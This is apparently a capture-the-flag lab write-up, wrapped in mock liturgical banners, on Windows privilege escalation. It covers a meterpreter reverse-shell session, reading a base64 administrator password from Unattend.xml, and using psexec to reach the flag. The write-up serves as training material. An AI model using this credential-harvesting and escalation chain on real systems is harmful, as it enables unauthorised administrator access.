+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
Tools used
Metasploit Framework
Workflow:
In this lab I already had a target machine set and accessible , so I created a reverse shell and uploaded it to the target machine through a python http server that I set up just for this.
I executed the shell on the target machine and I got a reverse shell session which I upgraded to meterpreter session through the sessions -u x.
After doing this I checked which user I was running on , PRIV-ESC\Student with the following privs:
meterpreter > getuid
Server username: PRIV-ESC\student
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilegeThe goal of this lab is to get a meterpreter session with elevated privileges.
Unattend.xml file does save data related to accounts for features such as Auto Login , which is what we are exploring in this lab. It stores passwords in plain text using base64 encoding. It is stored on Windows/Panther/Unattend.xml.
So naturally that’s what I checked and bingo , there was an administrator account with the password that we could use for later.
<AutoLogon>
<Password>
<Value>QWRtaW5AMTIz</Value>
<PlainText>false</PlainText>
</Password>
<Enabled>true</Enabled>
<Username>administrator</Username>
</AutoLogon>
After decoding this we got Admin@123 and I used it to get a meterpreter session using the psexec module from metasploit.
After this , the flag was in the Administrator account desktop.
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2020-10-27 15:14:30 +0530 desktop.ini
100666/rw-rw-rw- 32 fil 2020-11-07 12:33:58 +0530 flag.txt
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++